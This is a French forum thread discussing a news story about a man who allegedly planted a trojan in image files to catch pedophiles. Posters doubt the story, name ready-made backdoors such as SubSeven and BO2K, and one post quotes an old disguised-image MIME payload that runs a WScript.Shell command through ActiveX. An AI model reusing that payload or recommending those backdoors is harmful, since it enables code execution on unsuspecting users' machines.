Aller au contenu
  • Pas encore inscrit ?

    Pourquoi ne pas vous inscrire ? C'est simple, rapide et gratuit.
    Pour en savoir plus, lisez Les avantages de l'inscription... et la Charte de Zébulon.
    De plus, les messages que vous postez en tant qu'invité restent invisibles tant qu'un modérateur ne les a pas validés. Inscrivez-vous, ce sera un gain de temps pour tout le monde, vous, les helpeurs et les modérateurs ! :wink:

Un pirate.....


Messages recommandés

Oups, j'ai failli y passer....

 

Plus sérieusement, je trouve vraiment bizarre cette histoire ... un peu gonflé ... non ?

Attends, un mineur qui scrute sur internt (ok) qui fait son propre trojan (mouais) qu'il implante dans un fichier image (euh .. un mythe je crois) et en plus, il y passe plus de 16heures par jour (oki, c'est une légende urbaine!!).

Donc si on compte 16 heures par jour, il lui reste 8 heures pour vivre. Comme c'est un ado, il est obligé d'aller à l'école. On va dire une moyenne de 6 heures par jour, avec une heure pour le trajet (en tout). Ce qui lui reste 1 heures par jour pour : manger, pisser, chier, se brosser les dents, se laver et ... dormir.

Une chose est clair, je voudrais bien connaitre sa méthode car je suis un peu en manque de temps dernièrement ... :P

 

777, ze veux dormir

Lien vers le commentaire
Partager sur d’autres sites

suivant l'article il a 21 ans donc peut être dégagé des obligations scolaires ...

 

qu'il a créé son worm maybe , sinon suffit d'utiliser ceux existants .. un bon vieux backdoor ou subseven ou bo2k passwordé ....

 

pour l'implentation d'un virus dans un .jpg , j'ai cru voir un prog le permettant enfin il en vantait ses qualités ...

 

Bon en gros , des particuliers jouent les R.G et après donnent ca à la police :P

 

là ca touche la communeauté pedo donc personne crie scandale ... imaginer que ca touche la ligue de libération du cannabis :-(

 

ykz

Lien vers le commentaire
Partager sur d’autres sites

Arrêtez-moi si je me trompe, mais la loi américaine considère comme nulles toutes preuves obtenues de manière illégale. Donc au mieux ca pouvait être considéré comme un moyen de pression pour faire avouer les pédophiles ou un élément permettant l'obtention d'un mandat. Par contre tous les pédophiles arrêtés peuvent porter plainte contre le gars en question... moi à leur place je ne me gênerais pas.

En plus le gars est sois disant capable de coder lui-même un troyan (pourquoi faire? Il y en a tellement que c'est plus simple d'en prendre un tout fait) mais il est tellement con qu'il est pas capable de créer des routines pour archiver les données?!?!?

Ce serait pas un peu bidon comme news? En plus des arrestations dans le milieu pédophile avec plus de 3000 personnes impliquées et on en parle pas dans les journaux (TV et papier)? Ca me parait louche

Lien vers le commentaire
Partager sur d’autres sites

qu'il implante dans un fichier image (euh .. un mythe je crois

Un mythe ? Certains programmes font ça trés bien.

Il n'existe qu'un seul programme qui le fasse (par le même codeur que SilkRope pour ceux qui connaissent)... mais les images ne sont plus prises en charge par les browsers depuis longtemps (depuis IE4 je crois)

ceci dit ca permettait de lancer des fonctions, pas de lancer un executable contenu dans le jpg

MIME-Version: 1.0

To:

Subject:

.jpg

Content-Type: image/gif; charset=us-ascii

Content-Transfer-Encoding: 7bit

<script>var wsh=new ActiveXObject('WScript.Shell'); wsh.Run('telnet.exe');</script>

Lien vers le commentaire
Partager sur d’autres sites

Rejoindre la conversation

Vous publiez en tant qu’invité. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.
Remarque : votre message nécessitera l’approbation d’un modérateur avant de pouvoir être visible.

Invité
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.

  • En ligne récemment   0 membre est en ligne

    • Aucun utilisateur enregistré regarde cette page.
×
×
  • Créer...